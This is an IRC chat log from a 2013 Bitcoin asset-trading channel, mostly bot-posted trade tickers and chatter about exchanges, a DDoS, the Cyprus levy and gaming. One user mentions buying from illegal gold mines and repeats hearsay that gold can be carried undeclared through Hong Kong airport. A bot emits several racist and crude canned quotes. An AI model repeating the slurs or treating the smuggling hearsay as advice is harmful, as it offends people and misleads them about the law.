Mar 16 23:41:23 yea cherry trucks and like Mar 16 23:42:25 if you feel like it, make a little bitcoin bible. with miniatures and shit Mar 16 23:42:36 that'd kill. perfect way to start a blog Mar 16 23:43:01 The Buttcoin Bubble aka Bitcoin Bible Mar 16 23:43:31 bubbly butt, yum Mar 16 23:45:35 [MPEX] [S.MPOE] 3200 @ 0.0007219 = 2.3101 BTC [-] Mar 16 23:45:36 [MPEX] [S.MPOE] 7500 @ 0.00071809 = 5.3857 BTC [-] Mar 16 23:47:13 that would be funny Mar 16 23:55:34 [MPEX] [S.MPOE] 13100 @ 0.00071883 = 9.4167 BTC [+] Mar 16 23:59:16 !ticker mpex s.dice Mar 16 23:59:17 [MPEX:S.DICE] 1D: 0.005 / 0.00515678 / 0.00588217 (35046 shares, 180.72 BTC), 7D: 0.005 / 0.00552053 / 0.006 (85485 shares, 471.92 BTC), 30D: 0.00300001 / 0.00612233 / 0.0069 (2391935 shares, 14,644.22 BTC) Mar 17 00:01:49 [MPEX] [S.MPOE] 3850 @ 0.00071883 = 2.7675 BTC [+] Mar 17 00:01:57 ;;seen killerstorm Mar 17 00:01:57 I have not seen killerstorm. Mar 17 00:01:59 meh. Mar 17 00:02:04 people gotta learn to irc. Mar 17 00:03:31 ;;seen Ggabridome Mar 17 00:03:32 I have not seen Ggabridome. Mar 17 00:03:34 ;;seen gabridome Mar 17 00:03:35 gabridome was last seen in #bitcoin-assets 6 days, 2 hours, 24 minutes, and 48 seconds ago: I've updated the shell script with the id of the new key https://github.com/gabridome/mpex-sh/blob/master/mpex.sh Mar 17 00:03:57 did you see his twitter pic btw ? Mar 17 00:04:04 no Mar 17 00:05:02 [MPEX] [S.MPOE] 7375 @ 0.00071809 = 5.2959 BTC [-] Mar 17 00:05:03 [MPEX] [S.MPOE] 4825 @ 0.0007104 = 3.4277 BTC [-] Mar 17 00:05:30 https://twitter.com/Gabridome Mar 17 00:06:17 which dude? Mar 17 00:06:59 now that i dunno Mar 17 00:07:21 comparing to the blog photo... seems the left one Mar 17 00:08:23 [BTCTC] [ASICMINER-PT] 1 @ 0.89 BTC [-] Mar 17 00:09:07 [MPEX] [S.MPOE] 13000 @ 0.00071883 = 9.3448 BTC [+] Mar 17 00:09:08 [MPEX] [S.MPOE] 5895 @ 0.00072563 = 4.2776 BTC [+] Mar 17 00:09:10 [MPEX] [S.MPOE] 5450 @ 0.00072596 = 3.9565 BTC [+] Mar 17 00:09:12 [MPEX] [S.MPOE] 21355 @ 0.00072609 = 15.5057 BTC [+] Mar 17 00:22:13 mpex trade will be suspended in 10 minutes. Mar 17 00:22:20 trade should resume in about 10 minutes after that. Mar 17 00:41:07 trade is back. Mar 17 00:41:14 please report any issues you might notice thanks! Mar 17 00:44:14 so burned out Mar 17 00:51:53 tried simple buy order and works... but seems assbot is out of the loop Mar 17 00:52:38 shortly Mar 17 01:08:58 oops Mar 17 01:10:23 it was like: (16:08) Processing. Mar 17 01:10:29 the boom. Mar 17 01:10:32 *then Mar 17 01:12:29 !mp http://dpaste.com/1025145/ Mar 17 01:12:30 Processing. Mar 17 01:12:32 Response: http://dpaste.com/1025146/plain/ Mar 17 01:12:43 nice Mar 17 01:13:05 ok back to winning with assbot Mar 17 01:14:19 ;;bc,diff Mar 17 01:14:20 4847647.1520656 Mar 17 01:16:30 did some testing txs... no assbot dice Mar 17 01:16:41 does anyone have the mpex-rss.php feed available via bot request? Mar 17 01:16:59 jurov we are lookin into it Mar 17 01:17:00 oh i just did a STAT, jurov Mar 17 01:17:39 mod6 i don't understand the rss? you want to show rss data here in chan? Mar 17 01:17:59 and congrats on the STAT. Mar 17 01:18:28 [BTCTC] [ASICMINER-PT] 6 @ 0.89 = 5.34 BTC [-] Mar 17 01:19:25 just was curious if that feed existed anywhere. kinda needed to either update that one script of mine, or deprecate it until some later date. Mar 17 01:19:30 [BTCTC] [ASICMINER-PT] 2 @ 0.9 = 1.8 BTC [+] Mar 17 01:20:11 [MPEX] [S.MPOE] 1 @ 0.00072609 BTC [+] Mar 17 01:20:15 o hi. Mar 17 01:20:28 mod6 mpex-rss.php ? Mar 17 01:20:40 o you mean via bot. hm Mar 17 01:20:42 hey! Mar 17 01:20:43 it's a lot of lines tho... Mar 17 01:20:57 na, its not too important, but i had that one script that did it. Mar 17 01:21:09 maybe instead i'll just kill that old one and get the twitter feed instead Mar 17 01:21:19 i gotta do that o_auth thing though huh? Mar 17 01:21:33 you could get the stream off twitter yeh Mar 17 01:21:38 dunno..anyway. i'll check into it. thx. Mar 17 01:21:48 i still don't get it... what's the problem with http://mpex.co/mpex-rss.php ? Mar 17 01:21:55 seems to work fine Mar 17 01:21:58 anyway. mpex new monster setup seems 100% operational. webservers moved, trade engine moved. Mar 17 01:22:11 i'll be keeping an eye on things still, but generally we seem ok over here. Mar 17 01:22:12 jurov: it's back up!? Mar 17 01:22:18 ofc it is Mar 17 01:22:23 mod6 when was it down !? Mar 17 01:22:29 you mean the ddos stuff ? Mar 17 01:22:44 mod6 socket connection is up at all times too Mar 17 01:22:48 oh i guess i was unaware. yeah. ddos. Mar 17 01:23:11 haha you got some reading to do. Mar 17 01:23:17 that socket seems helpful kakobrekla - what's the rate on that? Mar 17 01:23:18 http://trilema.com/2013/mpex-ddosed-an-epic/ Mar 17 01:23:26 mod6 1 btc a year atm. Mar 17 01:23:34 really? that seems cool. Mar 17 01:23:43 mhm Mar 17 01:24:35 these 0.05 loads... Mar 17 01:24:55 kakobrekla, if i disconnect for some time, does it cache txs? Mar 17 01:25:10 and send all to me after reconnect? Mar 17 01:25:14 thx for the link mircea_popescu, i'll check it out when i get back here. Mar 17 01:25:17 jurov check the protocol Mar 17 01:25:18 http://bitcoin-assets.com/mpex-socket/ Mar 17 01:26:00 ok thanks again guys, bbl. Mar 17 01:26:03 i don't see anything about caching txs while client is disconnected Mar 17 01:26:09 Request a login token, post ‘username’, ‘pass’, ‘id’ to https://sauth.bitcoin-assets.com, Mar 17 01:26:09 where ‘id’ is the last trade id you already recieved (0 to load from begining or -1 to skip all history). Mar 17 01:26:15 as you connect you request a token Mar 17 01:26:23 with that you specify where you want to start Mar 17 01:26:33 that's a cool way to go about it Mar 17 01:26:35 from begining, from any point or just listen fro now on Mar 17 01:26:37 oh derp Mar 17 01:36:48 mircea_popescu: what's the likelihood of running a cjdns/hyperboria service? Mar 17 01:37:03 hm Mar 17 01:37:25 are you involved with that ? Mar 17 01:39:39 miscreanity ^ Mar 17 01:39:44 been following it for a while Mar 17 01:40:07 strong conceptual appeal Mar 17 01:40:12 here's the rthing : it is interesting, and yes. Mar 17 01:41:05 the way i'd go about this is, i'd sponsor a node to run a hyperboria mpex proxy Mar 17 01:41:09 as in, pay for the server Mar 17 01:41:16 as a way to sponsor the project / encourage research. Mar 17 01:42:31 reasonable Mar 17 01:42:52 so if you happen to know anyone that'd do it... Mar 17 01:43:18 possibly Mar 17 01:47:55 [BTCTC] [S.DICE-PT] 2 @ 0.00512 = 0.0102 BTC [-] Mar 17 01:47:56 [BTCTC] [S.DICE-PT] 20 @ 0.005 = 0.1 BTC [-] Mar 17 01:47:58 [BTCTC] [S.DICE-PT] 15 @ 0.0049 = 0.0735 BTC [-] Mar 17 01:48:00 [BTCTC] [S.DICE-PT] 15 @ 0.00488 = 0.0732 BTC [-] Mar 17 01:52:54 $vwap s.dice Mar 17 01:52:55 smickles: 1 day: average: 0.00513634 high: 0.0055 low: 0.005 volume: 33095 btc: 169.9872064 7 day: average: 0.00552045 high: 0.006 low: 0.005 volume: 85535 btc: 472.19157198 30 day: average: 0.00612231 high: 0.0069 low: 0.00300001 volume: 2391985 btc: 14644.484222 Mar 17 01:53:09 mircea_popescu: ^^ to your liking? Mar 17 01:53:33 $vwap ^oix Mar 17 01:53:34 smickles: 1 day: no data 7 day: average: 42.97673204 high: 57.7102934 low: 37.4449091 volume: 30582 btc: 3176.68341381 30 day: no data Mar 17 01:53:39 that works for sure. Mar 17 01:53:48 course better ask FabianB Mar 17 01:54:02 oh? was FabianB using it for the json? Mar 17 01:54:27 ofc, the full one delivered via pastbin is still the json Mar 17 01:54:37 possibly Mar 17 01:55:53 http://www.reddit.com/r/Bitcoin/comments/1af3aq/from_trilema_boys_and_girls_i_got_news_were_being/ Mar 17 01:56:03 so it turns out bitinstant was just having dns issues, not ddos. Mar 17 01:59:26 https://github.com/bitcoin/bitcoin/pull/2373 mircea, no 1M blocks for ya before May 15 Mar 17 02:03:40 A new checkblock rule Mar 17 02:03:47 ill bet you the rule will have a bug in it. Mar 17 02:09:52 davout ahaha cyprus specials ? Mar 17 02:09:53 lmao. Mar 17 02:11:45 more to come Mar 17 02:12:05 italy, spain, ... Mar 17 02:12:25 i'll whip out my suprise du chef when it'll be france's turn Mar 17 02:12:48 hahaah Mar 17 02:15:57 [BTCTC] [BTC-TRADING-PT] 26 @ 0.2597 = 6.7522 BTC [-] Mar 17 02:15:59 [BTCTC] [BTC-TRADING-PT] 54 @ 0.2598 = 14.0292 BTC [+] Mar 17 02:17:44 [BTCTC] [BTC-TRADING-PT] 20 @ 0.2598 = 5.196 BTC [+] Mar 17 02:20:38 hm Mar 17 02:20:51 [BTCTC] [BTC-TRADING-PT] 30 @ 0.2598 = 7.794 BTC [+] Mar 17 02:21:29 i must start a new movement Mar 17 02:22:18 [BTCTC] [BTC-TRADING-PT] 3 @ 0.2598 = 0.7794 BTC [+] Mar 17 02:23:28 which way ? Mar 17 02:23:54 to teh futureh! Mar 17 02:24:43 lol Mar 17 02:38:10 what are you all using for infrastructure management? Mar 17 02:38:31 chef/puppet/whatever Mar 17 02:38:33 bash scripts Mar 17 02:39:57 i got ppls Mar 17 02:40:03 but i think they like puppet mostly Mar 17 02:40:23 same here Mar 17 02:45:43 http://bitbet.us/bet/312/npda-college-debate-championship-2013-mckendree-college/ Mar 17 02:45:44 o.o Mar 17 02:45:49 i didn't know anyone even cared Mar 17 02:46:02 internal thingy? Mar 17 02:47:52 maybe Mar 17 02:48:01 o wait, bfl announced they're not shipping in march ?! Mar 17 02:48:10 what? Mar 17 02:48:22 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/#c374 Mar 17 02:48:25 i dunno Mar 17 02:49:04 i think we would hear about it in here by now Mar 17 02:49:37 prolly just trash talking Mar 17 02:54:20 [BTCTC] [PAJKA.BOND] 104 @ 0.105 = 10.92 BTC [+] Mar 17 02:57:40 they arent Mar 17 02:57:41 fuckers Mar 17 02:58:30 !ticker mpex s.dice Mar 17 02:58:31 [MPEX:S.DICE] 1D: 0.005 / 0.00513634 / 0.0055 (33095 shares, 169.99 BTC), 7D: 0.005 / 0.00552044 / 0.006 (85535 shares, 472.19 BTC), 30D: 0.00300001 / 0.00612471 / 0.0069 (2345295 shares, 14,364.26 BTC) Mar 17 03:20:11 [HAVELOCK] [HIM] 10 @ 1.999 = 19.99 BTC [+] Mar 17 03:28:07 can I ask assbot for the last trade? if so how? Mar 17 03:28:16 ;;last Mar 17 03:28:16 [18:27:59] can I ask assbot for the last trade? if so how? Mar 17 03:28:20 :DDDD Mar 17 03:28:28 hrm. Mar 17 03:28:31 02:20.01 ( @assbot ) [HAVELOCK] [HIM] 10 @ 1.999 = 19.99 BTC [+] Mar 17 03:28:35 heres your last trade Mar 17 03:28:37 nono Mar 17 03:28:50 blacktape2 is listening just to assbot Mar 17 03:29:10 hm Mar 17 03:29:24 also i just realized that if assbot will show last trade i have some work to do Mar 17 03:29:40 currently assuming that all trades out of assbot are unique Mar 17 03:29:43 well iirc i hold the last trade data cause i need it for the + or - Mar 17 03:30:07 so in theory it could be asked for Mar 17 03:30:36 but we can just make the syntax so your bot doesnt get confused Mar 17 03:31:12 i would love to be able to query assbot for the last trade of assets Mar 17 03:31:22 ok Mar 17 03:31:24 ill add it Mar 17 03:31:44 ;;last assbot Mar 17 03:31:44 (last [--{from,in,on,with,without,regexp} ] [--nolimit]) -- Returns the last message matching the given criteria. --from requires a nick from whom the message came; --in requires a channel the message was sent to; --on requires a network the message was sent on; --with requires some string that had to be in the message; --regexp requires a regular expression the message must (1 more message) Mar 17 03:32:00 ;;last --from assbot Mar 17 03:32:00 [18:20:02] [HAVELOCK] [HIM] 10 @ 1.999 = 19.99 BTC [+] Mar 17 03:32:07 ;;last --in assbot Mar 17 03:32:07 Error: 'assbot' is not a valid channel. Mar 17 03:32:38 damn, assbot never talks about previous partners, seems gribble won't help us find out Mar 17 03:32:41 Unfortunatly, no one else thought of that yet, smickles. Congratulations. Mar 17 03:34:45 any truth or link to bfl delay? Mar 17 03:34:59 idk of one. I'd like to know Mar 17 03:35:34 Looks like BFL is in the forever "almost" zone. Mar 17 03:36:06 4 to 6 weeks forever is what i say Mar 17 03:36:18 i kinda thought they would ship in march, but i might losethat bety Mar 17 03:36:39 have faith in not having faith in bfl Mar 17 03:36:56 anyone happen to know total hash of batch 1 for avalon, and then batch 2? Mar 17 03:39:10 iv made so much money off of bfl fail it wont matter if i lose one bet :) Mar 17 03:39:13 bfl lol Mar 17 03:40:56 yeah they have a statue now http://josh-zerlan.com/ Mar 17 03:41:29 oh lol Mar 17 03:41:41 makes me want to register my name Mar 17 03:41:49 you gonna fail too? Mar 17 03:41:52 oh wait. Mar 17 03:42:53 lol, i never failed, but i keep trusting scammers, lol Mar 17 03:42:54 [MPEX] [S.DICE] 2229 @ 0.00530736 = 11.8301 BTC [-] Mar 17 03:43:10 failed at trusting then Mar 17 03:43:22 dont worry it happens a lot Mar 17 03:43:36 still, even though i lost monhey in things like glbse and bitcoinica im still okay, never riskmore than you can lose... Mar 17 03:43:55 indeed Mar 17 03:44:15 i wonder if that bitcoinica thing will ever work out Mar 17 03:44:22 i have 700 btc id like to see atleast 50% of... Mar 17 03:44:40 converted back to current rate Mar 17 03:44:41 2 btc. Mar 17 03:44:47 muahaha. Mar 17 03:44:53 not sure if it was converted Mar 17 03:45:02 doesnt matter shit Mar 17 03:45:11 way easier to pay Mar 17 03:45:47 mt gox should not have messed with it Mar 17 03:46:01 it is in a mt gox account, they just wont give it away Mar 17 03:46:33 i admit i might not get more than 2 btc but i hope i atleast get 1/2 Mar 17 03:46:40 most people got 50% already Mar 17 03:46:54 next short opportunity of cheap coins, mtgox gets closed Mar 17 03:47:15 lol if mt gox fails before i get my coins back... Mar 17 03:51:02 tried to sign up for bitfunder, after i did all the hoops i was rejected cuz no weexchange account... facepalm Mar 17 03:52:35 as a user or to issue an asset? Mar 17 03:54:04 [BTCTC] [GSDPT] 10 @ 0.00498 = 0.0498 BTC [-] Mar 17 03:54:45 [BTCTC] [S.DICE-PT] 62 @ 0.00488 = 0.3026 BTC [-] Mar 17 03:54:47 [BTCTC] [S.DICE-PT] 100 @ 0.00487 = 0.487 BTC [-] Mar 17 03:54:58 [BTCTC] [S.DICE-PT] 20 @ 0.00482 = 0.0964 BTC [-] Mar 17 03:55:24 dub i was trying to send in btc to but asicminer Mar 17 03:55:32 buy* Mar 17 03:56:02 i was thinking about sending in assets too, but they were like you MUST have a weexchange account, here is your code... that pissed me off... Mar 17 03:57:17 [BTCTC] [GSDPT] 1 @ 0.0046 BTC [-] Mar 17 03:57:19 [BTCTC] [GSDPT] 10 @ 0.00452 = 0.0452 BTC [-] Mar 17 03:57:21 [BTCTC] [GSDPT] 354 @ 0.00451 = 1.5965 BTC [-] Mar 17 03:57:23 [BTCTC] [GSDPT] 500 @ 0.004501 = 2.2505 BTC [-] Mar 17 03:57:27 needless to say they lost a potential customer Mar 17 03:59:53 [BTCTC] [S.DICE-PT] 1000 @ 0.0046 = 4.6 BTC [-] Mar 17 04:01:07 [BTCTC] [BTC-BOND] 7 @ 0.009989 = 0.0699 BTC [+] Mar 17 04:01:40 whut? Mar 17 04:02:20 $dept s.dice Mar 17 04:02:28 $depth s.dice Mar 17 04:02:29 smickles: Bids: ['71 @ 530736', '1250 @ 519980', '20000 @ 500000', '2361 @ 500000', '22222 @ 444440'] Mar 17 04:02:30 smickles: Asks: ['1080 @ 537099', '1950 @ 544503', '500 @ 577800', '700 @ 577905', '2000 @ 584999'] Mar 17 04:02:41 [BTCTC] [BTC-BOND] 103 @ 0.00999 = 1.029 BTC [+] Mar 17 04:02:43 [BTCTC] [BTC-BOND] 48 @ 0.00999 = 0.4795 BTC [+] Mar 17 04:02:44 [BTCTC] [BTC-BOND] 20 @ 0.00999 = 0.1998 BTC [+] Mar 17 04:02:56 [BTCTC] [S.DICE-PT] 467 @ 0.004551 = 2.1253 BTC [-] Mar 17 04:03:27 i was gonna signup too, thats a bit watly Mar 17 04:03:48 [BTCTC] [BTC-BOND] 104 @ 0.01 = 1.04 BTC [+] Mar 17 04:04:15 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Mar 17 04:04:21 Ah... S.DICE-PT is going down but BTC-BOND goes up? Mar 17 04:04:38 Odd. Mar 17 04:06:16 [MPEX] [S.MPOE] 11200 @ 0.00072609 = 8.1322 BTC [+] Mar 17 04:14:38 [BTCTC] [S.DICE-PT] 300 @ 0.004552 = 1.3656 BTC [+] Mar 17 04:14:40 [BTCTC] [S.DICE-PT] 54 @ 0.004551 = 0.2458 BTC [-] Mar 17 04:15:12 [MPEX] [S.MPOE] 9450 @ 0.00072609 = 6.8616 BTC [+] Mar 17 04:21:19 [BTCTC] [ASICMINER-PT] 1 @ 0.9 BTC [+] Mar 17 04:24:38 65 less than 32000 losses in a row... s dice broken? Mar 17 04:25:35 and i thought my less than 16000 23 losses in a row where bad Mar 17 04:32:45 apparently s.dice removed withdrawals too. Mar 17 04:33:28 withdrawals? what do you mean Mar 17 04:33:50 i thought it was a bet, return winnings/loss-indicator Mar 17 04:33:58 how would there be withdrawals? Mar 17 04:34:09 fine. payouts Mar 17 04:34:40 mpex went deposits only, then s.dice, it's a disease Mar 17 04:41:21 s dice no longer pays? lol Mar 17 04:41:31 100% profit http://i.imgur.com/GhH7b2H.png Mar 17 04:41:55 payouts have been deprecated Mar 17 04:42:25 i mean winning. Mar 17 04:43:23 deflationary ftw Mar 17 04:43:40 Chaang-Noi: eh? the first line on that is a win. Mar 17 04:43:50 smickles we're kidding man Mar 17 04:43:56 oh Mar 17 04:43:58 -_- Mar 17 04:44:01 lol poor smickles Mar 17 04:44:41 smickles but howe many in a row are not? :) Mar 17 04:45:05 that is a lot Mar 17 04:45:15 65 of under 32000 Mar 17 04:45:29 odds are better to win 3 less than 1 in a row Mar 17 04:46:24 im bored... i need to get a hobby, sad cuz bitcoin was my hobby, then it came my life... Mar 17 04:46:51 chang we can play tf2 if you have a decent pc Mar 17 04:47:26 yeah quad 7970s Mar 17 04:47:32 that shit was my drug before bitcoins Mar 17 04:47:38 but linux.... Mar 17 04:47:40 i had 1800 hours logged in Mar 17 04:47:53 Chaang-Noi: native tf2 on linux now Mar 17 04:47:55 i did buy like 20 steam games from that steam btc guy Mar 17 04:48:07 oh, cool Mar 17 04:48:22 runs faster than on win, usually Mar 17 04:48:27 i used to sell hats for paypal back in the day Mar 17 04:48:28 nice Mar 17 04:48:33 *usually as in for most people Mar 17 04:48:41 i have a windows box set up just for gaming but i dont use it Mar 17 04:49:14 the most expensive hat in tf2 goes for around 3k USD Mar 17 04:49:35 from what i understand you have to buy something to get the good stuff Mar 17 04:49:49 no Mar 17 04:49:51 i tried the free game for a while, but never got anything good Mar 17 04:49:57 well Mar 17 04:49:59 not true? Mar 17 04:49:59 its just hats Mar 17 04:50:02 cosmetic thing Mar 17 04:50:09 gameplay wise, you dont need them really Mar 17 04:50:15 i see Mar 17 04:50:23 but people tend to go crazy over them Mar 17 04:50:25 hmm, is anyone doing gift certs anymore ? Mar 17 04:50:30 well... i kinda doubt it is something i could make money at Mar 17 04:50:41 i sold my backpack for $350 for playing a game Mar 17 04:50:44 mp want out of btc into fiat? Mar 17 04:50:51 nah just want to send a gift Mar 17 04:50:54 u can make money off of it, but its not enough Mar 17 04:51:01 this website closed down its "selling" side of its services citing, there wasn't enough demand for this Mar 17 04:51:04 heh Mar 17 04:51:19 https://www.spendbitcoins.com/convert/ Mar 17 04:51:20 i found a site last night that would let you order anything online using btc Mar 17 04:51:31 their reason is hilarious, pretty sure i know why Mar 17 04:51:34 i forgot the name :/ Mar 17 04:52:10 the site charged like a 3 or 5$ fee for an order, it was pretty decent price Mar 17 04:52:17 wish i saved that link... Mar 17 04:52:24 chaang any ssd? Mar 17 04:53:43 mp here you go https://bitspend.net/ Mar 17 04:53:59 just have them mail a gift to whomevar Mar 17 04:54:22 i think their anon and privacy stuff Mar 17 04:54:22 no ssd, this was old mining rigs... i would not have 6990s and 7970s cuz anything else Mar 17 04:54:33 like* Mar 17 04:55:07 anyone ever uses this site? https://bitspend.net/ ? Mar 17 04:55:11 Chaang-Noi cheebydi coingenuity ColdHardMetal copumpkin Cory Mar 17 04:55:15 Chaang-Noi do you know who runs it ? Mar 17 04:55:36 yeah, kind of Mar 17 04:55:40 mp no i do not Mar 17 04:55:47 their names are listed on the main page Mar 17 04:55:49 but i dont know them Mar 17 04:56:00 yeah was looking for more like, a wot person Mar 17 04:56:18 i know someone on here ballz deep involved Mar 17 04:56:20 i dont use wot, sorry Mar 17 04:57:09 i think the guy has done other bitcoin stuff before Mar 17 04:57:31 if i needed anything i would test it out Mar 17 04:57:45 bank holiday in cyprus Mar 17 04:57:45 lol Mar 17 04:57:50 lol Mar 17 04:57:54 runz im sure Mar 17 04:57:54 Bowjob ya after they got charged like 105 Mar 17 04:58:01 cyprus is pretty much dead. Mar 17 04:58:02 % Mar 17 04:58:06 it will be like haiti Mar 17 04:58:09 try that in bitcoin Mar 17 04:58:11 lol Mar 17 04:58:29 im sure Luke-Jr will come up with some system. Mar 17 04:58:34 lol Mar 17 04:58:57 its safe to use Mar 17 04:59:09 legit company Mar 17 04:59:16 how long before europe rips apart...? this year? Mar 17 04:59:39 depends how germany does in elections Mar 17 04:59:49 if the merkel dissidents get seats... Mar 17 05:00:20 hmm Mar 17 05:00:25 when arethe elections? Mar 17 05:01:23 not sure how they thought taking money from people who keep money is banks was a good diea, people everywhere will just pull out cash, making it crash faster... Mar 17 05:02:03 they could impose a withrawal limit after the holiday Mar 17 05:02:11 Bowjob they prolly will. Mar 17 05:02:18 "According to Reuters news agency, almost half of the depositors in Cyprus are believed to be non-resident Russians. " Mar 17 05:02:30 lol Mar 17 05:02:46 im sure cyprus would happily take deposits though Mar 17 05:03:33 "The point of the levy is to warn lenders to banks that they should take care where they place their funds" so the point is, do not lend money to banks???? wtf Mar 17 05:03:44 exactly. Mar 17 05:03:58 this is going to fix what? Mar 17 05:05:04 gold and btc... fuck banks and governments Mar 17 05:05:47 and.... btc-e is down Mar 17 05:05:54 i wouldn't bother with gold unless you can get it for 30% below market price Mar 17 05:06:55 theres this dude who tried to sell 1 oz of gold coin for $25 Mar 17 05:07:03 he failed.. Mar 17 05:07:34 i bought my gold at $300 to $400 an oz Mar 17 05:07:39 silver average around 47.5 Mar 17 05:07:42 nice Mar 17 05:07:51 i was too young to appreciate it back then Mar 17 05:08:01 around 2001 right? Mar 17 05:08:06 i was not... i was 20ish Mar 17 05:08:07 yeah Mar 17 05:08:22 everyone should ahve 10% atleast of their wealth in gold/silver Mar 17 05:08:36 yep back to asia for that Mar 17 05:08:42 not paying western market prices Mar 17 05:09:02 gold here in asia is the same price as in the west... Mar 17 05:09:19 not at illegal gold mines Mar 17 05:09:34 in asia? Mar 17 05:09:48 well any africa, etc but for me, asia Mar 17 05:10:04 well im sure you can get a discount but i highly doubt it is worth the travel/risks Mar 17 05:10:34 best to not say anymore but its all sweet Mar 17 05:10:57 you just need the connect Mar 17 05:12:07 lol Mar 17 05:12:13 been advised to fly to HK airport Mar 17 05:12:20 heard they don't give a F#$@$ there Mar 17 05:12:38 have you been to hk before? Mar 17 05:12:51 a Mar 17 05:13:01 you know HK is in china right? Mar 17 05:13:02 nope Mar 17 05:13:06 yep Mar 17 05:13:13 before 97 it was under brittish Mar 17 05:13:16 and they handed it back Mar 17 05:13:17 etc Mar 17 05:13:19 do you think china is the kinda place that just does not give a fuck? Mar 17 05:13:40 i dont know but there's people doing it now Mar 17 05:14:08 and its been advised, from lawyers, hk airport is the best, they don't care about gold Mar 17 05:14:12 only guns and drugs Mar 17 05:14:24 you can walk in with 1kg in your pocket Mar 17 05:14:24 flying into hk is about as bad as flying into the usa... Mar 17 05:14:38 http://business.financialpost.com/2013/03/14/only-jesus-can-save-the-eurozone-deutsche-bank/ Mar 17 05:14:39 heh Mar 17 05:15:01 most places will let you bring in gold and or silver in asia... Mar 17 05:15:02 all i know is all the people that smuggling gold out of other countries take it to hk Mar 17 05:15:29 you might be thinking about vietnam, it is aabout the only place that really limits the trade here Mar 17 05:15:52 mp, im shocked that guy thinks even jesus can save it... Mar 17 05:16:10 btw hk would have been amazing before 97 me thinks Mar 17 05:16:23 did you get to check it out? Mar 17 05:16:23 ok guies Mar 17 05:16:30 well jesus can turn fish into wine and whine into labour so Mar 17 05:16:44 ready for some nostalgia? Mar 17 05:16:47 he could supposedly turn 50mn arrogant yet clueless youths into some sort of useful resource. Mar 17 05:16:47 !last glbse ppt.e Mar 17 05:16:52 o wait fuck Mar 17 05:17:23 lulz Mar 17 05:17:36 glbse + pirate :) Mar 17 05:18:00 !last glbse ppt.e Mar 17 05:18:00 Last trade for PPT.E on GLBSE: 0.32 [-] Mar 17 05:18:03 ta-daaa Mar 17 05:18:24 !last glbse tygrr-a Mar 17 05:18:24 Last trade for TYGRR-A on GLBSE: Mar 17 05:18:51 ? Mar 17 05:18:55 Christos Stylianides, a government spokesman, tried to calm public anger, saying: "The situation is serious but not tragic, there is no reason to panic." Mar 17 05:18:58 you got the ticker wrong Mar 17 05:19:02 right-o. you just lost your money, big deal. Mar 17 05:19:21 !last m f.giga.etf Mar 17 05:19:22 Last trade for F.GIGA.ETF on MPEX: 0.00000001 [-] Mar 17 05:19:26 cook. Mar 17 05:19:28 cool. Mar 17 05:19:29 !last trade TYGRR-P Mar 17 05:19:29 Last trade for TYGRR-P on TRADE: Mar 17 05:19:38 !last glbse tygrr-p Mar 17 05:19:44 !last glbse tygrr-p Mar 17 05:19:45 Ah, your hair. Your hair is soft. It's like a girl's. Now how do you get it that way? Mar 17 05:19:49 :D Mar 17 05:19:52 i give Mar 17 05:20:03 did you have a dot? Mar 17 05:20:09 !last glbse tygrr.p Mar 17 05:20:10 It says some pelt-wearin' trapper, some stinkin' bean-suckin' possum skinner, he's gonna collect that reward money. Mar 17 05:20:18 it was smth else Mar 17 05:20:20 no it was tygrr-p or a or b... Mar 17 05:20:25 but its not a big dead Mar 17 05:20:30 its there Mar 17 05:20:31 !last glbse gigiminer Mar 17 05:20:32 It's so strange that you don't remember any of your poetry. Mar 17 05:20:34 just gotta get the name right Mar 17 05:20:40 !last glbse gigamining Mar 17 05:20:41 Last trade for GIGAMINING on GLBSE: 0.56515 [+] Mar 17 05:20:46 !last glbse yabmc Mar 17 05:20:47 Last trade for YABMC on GLBSE: 0.0769 [+] Mar 17 05:20:52 is this cuz he delisted my stuff before glbse closed? Mar 17 05:20:53 !last m s.bbet Mar 17 05:20:54 Last trade for S.BBET on MPEX: 0.002014 [+] Mar 17 05:21:17 assbot echoed tygrr afaik Mar 17 05:21:19 so its there Mar 17 05:21:26 hmm Mar 17 05:21:27 i can search by it Mar 17 05:21:29 !last tygrr Mar 17 05:21:29 cant Mar 17 05:21:29 Shit. You ain't even old enough to smoke. Mar 17 05:21:35 !last glbse Mar 17 05:21:35 Stupid fucking white man. Mar 17 05:21:40 its unserachable. Mar 17 05:21:40 !last glbse tygrr Mar 17 05:21:41 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Mar 17 05:22:03 assbot called me stupid when i was being stupid.. :) Mar 17 05:22:12 its smart like dat. Mar 17 05:22:34 ltc, why are you not over $1` yet.. and BTC why not over $50 yet.... Mar 17 05:22:45 !ticker glbse TYGRR.BOND-B Mar 17 05:22:45 Are you sure you have no tobacco? Mar 17 05:22:49 eh Mar 17 05:22:53 !l glbse TYGRR.BOND-B Mar 17 05:22:54 Last trade for TYGRR.BOND-B on GLBSE: 0.1 [-] Mar 17 05:22:56 there Mar 17 05:22:59 ... Mar 17 05:23:00 btc-e is down Mar 17 05:23:01 fail Mar 17 05:23:06 cool :) Mar 17 05:23:09 Chaang-Noi doesnt even know its own ticker :p Mar 17 05:23:22 chang u have 200k LTC? Mar 17 05:23:23 also ticker now has a short hand Mar 17 05:23:30 !t h sdice Mar 17 05:23:33 [HAVELOCK:SDICE] 1D: 0.51000000 / 0.5145676 / 0.54000000 (177 shares, 91.07846527 BTC), 7D: 0.50030000 / 0.54542883 / 0.61999910 (1272 shares, 693.78546779 BTC), 30D: 0.37000000 / 0.6066357 / 0.75900000 (5798 shares, 3517.27376851 BTC) Mar 17 05:23:37 bowjob btc-e is fine, go tell them to whitelist your ip Mar 17 05:23:42 enjoy Mar 17 05:23:54 iv not used my tickers in a long time :/ Mar 17 05:23:56 so you can log in?] Mar 17 05:23:58 mhm Mar 17 05:24:09 #litecoin-markets and yes i can log in Mar 17 05:24:16 you need ot get your ass whitelisted Mar 17 05:24:21 !t h dice Mar 17 05:24:23 You know, I've had it up to here with this Indian malarkey. Mar 17 05:24:27 !t h sd Mar 17 05:24:28 These beans is shit. Mar 17 05:24:40 sdice pls Mar 17 05:24:43 !; btct asicminer Mar 17 05:25:01 !l btct asic Mar 17 05:25:01 Your actions are useless. Mar 17 05:25:05 yes they are Mar 17 05:25:23 !echo goatsex Mar 17 05:25:45 no, im a donky fucker. Mar 17 05:26:08 assbot has too many jokes built inside Mar 17 05:26:42 its not too many if it fits in. Mar 17 05:27:11 I guess I'm not around when MPEx is getting volume. I see good daily volume but I hardly notice as many trades as before. Mar 17 05:27:52 nome one is 